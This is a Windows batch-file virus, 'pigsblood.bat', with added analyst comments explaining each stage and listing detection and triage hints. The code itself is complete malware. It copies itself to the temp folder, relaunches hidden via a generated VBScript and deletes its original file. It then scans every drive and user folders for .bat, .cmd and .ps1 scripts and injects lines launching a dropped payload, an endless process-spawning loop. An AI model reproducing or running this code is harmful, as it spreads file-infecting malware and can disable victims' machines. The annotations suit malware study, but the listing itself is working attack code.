pigsblood.bat
@echo off
REM ---------------------------------------------------------------------------
REM Analyst notes (defensive annotation; the code lines are unchanged).
REM Summary of the statements below: the script copies itself into %temp%,
REM relaunches that copy through a generated VBScript with a hidden window,
REM deletes the file it was started from, drops a second batch file, builds a
REM list of .bat/.cmd/.ps1 files, and writes to those files so that they
REM reference the dropped batch file.
REM On-disk artifacts named in this listing:
REM   %temp%\pi9zbl00d.bat   copy of this script
REM   %temp%\init.vbs        generated launcher; its absence selects the first-run branch
REM   %temp%\slau9hT3r.bat   dropped payload
REM   %temp%\inf.ini         list of script paths collected by the scan
REM   %temp%\NAME.tmp        temporary copy of each target, deleted afterwards
REM The string on the REM line that follows these notes is the marker the
REM script looks for with find /I to decide whether to skip a file; the same
REM marker is written into the dropped payload.
REM NOTE(review): these notes follow the statements as written; confirm actual
REM runtime behaviour in an isolated sandbox before relying on them.
REM ---------------------------------------------------------------------------
REM #BEatngU
REM Sabre is hungry...
copy /Y "%0" "%temp%\pi9zbl00d.bat"
REM First-run branch: taken only when %temp%\init.vbs does not exist yet.
REM It writes a four-line VBScript that sleeps 5000 ms and then runs its first
REM argument through WScript.Shell.Run with window style 0 and no wait, starts
REM that script with cscript against the %temp% copy, deletes the launching
REM file and stops.
REM Detection: cscript.exe running a .vbs from %temp% that in turn starts a
REM .bat from %temp% with no visible window.
if not exist "%temp%\init.vbs" (
:: invisible execution
@echo WScript.Sleep 5000>"%temp%\init.vbs"
@echo zexec ^= WScript.Arguments^(0^)>>"%temp%\init.vbs"
@echo Set objShell ^= CreateObject^("WScript.Shell"^)>>"%temp%\init.vbs"
@echo objShell.Run zexec, 0, False>>"%temp%\init.vbs"
cscript "%temp%\init.vbs" "%temp%\pi9zbl00d.bat"
:: melt
del /f /q "%0"
goto :EOF
)
REM Later-run path, reached when init.vbs is already present: record the
REM payload path and call the :setup routine at the bottom of the file, which
REM writes the payload file.
:: setup payload
set "evil=%temp%\slau9hT3r.bat"
call :setup
REM Enumeration: for every listed drive letter that exists, append the full
REM paths of *.bat, *.cmd and *.ps1 files to %temp%\inf.ini. On the drive equal
REM to %homedrive% only six folders under %userprofile% are searched; any other
REM drive is searched recursively from its root.
:: scan for available drives
set "index=%temp%\inf.ini"
setlocal enabledelayedexpansion
For %%A IN (A,B,C,D,E,F,G,H,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) do (
set "drive=%%A"
:: if drive exists...
if exist "!drive!:\" (
:: local disk
if "!drive!:" EQU "%homedrive%" (
For %%B IN (Documents, Downloads, Videos, Music, Desktop, Favorites) do (
set "dir=%%B"
dir /s /b "%userprofile%\!dir!\*.bat">>"%index%"
dir /s /b "%userprofile%\!dir!\*.cmd">>"%index%"
dir /s /b "%userprofile%\!dir!\*.ps1">>"%index%"
)
) else (
:: alt external drive
dir /s /b "!drive!:\*.bat">>"%index%"
dir /s /b "!drive!:\*.cmd">>"%index%"
dir /s /b "!drive!:\*.ps1">>"%index%"
)
)
)
REM Modification loop: reads inf.ini line by line. A file in which find /I
REM locates the marker is sent to :skip. Otherwise the file name and extension
REM are extracted, the file is copied to %temp%\NAME.tmp, a launcher line naming
REM the payload is emitted, using Start-Process for .ps1 and cmd /c start for
REM .bat and .cmd, the saved lines are appended to the target again, and the
REM temp copy is deleted.
REM Triage: script files that reference slau9hT3r.bat have been touched by this
REM loop and should be restored from a known-good copy; files that contain the
REM marker string are copies of this script or of the payload.
:: iterate through index list
For /F "delims=" %%C IN (%index%) DO (
set "file=%%C"
:: avoid script overwrite
>nul find /I "#BEatngU" "!file!" && (
goto :skip
) || (
goto :infect
)
:infect
:: gather file information
For %%i IN (!file!) DO (
set "name=%%~ni"
set "extn=%%~xi"
)
If "!extn!" == ".ps1" (
goto :inf_ps1
) ELSE (
goto :inf_batcmd
)
:inf_ps1
:: clone original script
set "dummy=%temp%\!name!.tmp"
Copy /Y "!file!" "%dummy%" >NUL
:: overwrite
@ECHO Start-Process "%evil%">>"!file!"
:: append original code
For /F "delims=" %%t IN (%dummy%) DO (
set "line=%%t"
echo !line!>>"!file!"
)
del /f /q "%dummy%"
goto :skip
:inf_batcmd
:: clone original script
set "dummy=%temp%\!name!.tmp"
Copy /Y "!file!" "%dummy%" >NUL
::overwrite
@ECHO cmd /c start "" "%evil%"
:: append original code
For /F "delims=" %%g IN (%dummy%) DO (
set "line=%%g"
echo !line!>>"!file!"
)
del /f /q "%dummy%"
:skip
)
REM After the loop the running copy deletes itself. No exit or goto precedes
REM the :setup label, so execution continues into it.
:: melt
del /q /f "%0"
REM :setup writes the payload file at the path held in the evil variable: the
REM marker, a label, a start line and a goto back to that label. That is an
REM unbounded process-spawning loop, which can exhaust system resources if the
REM payload is ever launched.
:setup
:: stage your payload here
(
@echo rem #BEatngU
@echo :x
@echo start ^%0
@echo goto x
)>"%evil%"
:EOF